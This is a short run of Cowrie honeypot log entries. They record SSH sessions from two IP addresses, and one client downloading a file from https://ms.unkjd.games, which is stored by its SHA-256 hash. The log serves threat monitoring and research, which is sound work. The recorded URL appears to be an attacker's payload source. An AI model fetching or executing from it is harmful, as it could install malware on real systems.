{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/db445c8a135dc9c85d96ff7d2cf8c4b91e0f15fe2c3a52a5125436f5f7e0f06d","size":0,"shasum":"db445c8a135dc9c85d96ff7d2cf8c4b91e0f15fe2c3a52a5125436f5f7e0f06d","duplicate":true,"duration":"1.8","message":"Closing TTY Log: var/lib/cowrie/tty/db445c8a135dc9c85d96ff7d2cf8c4b91e0f15fe2c3a52a5125436f5f7e0f06d after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T09:01:42.881578Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.closed","duration":"100.1","message":"Connection lost after 100.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T09:01:42.884872Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:43.125144Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.closed","duration":"26.1","message":"Connection lost after 26.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T09:01:43.943711Z","src_ip":"77.83.207.83","session":"514bbfe86b48"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:45.358387Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.closed","duration":"116.4","message":"Connection lost after 116.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T09:01:59.061009Z","src_ip":"212.227.125.160","session":"9f264c568782"}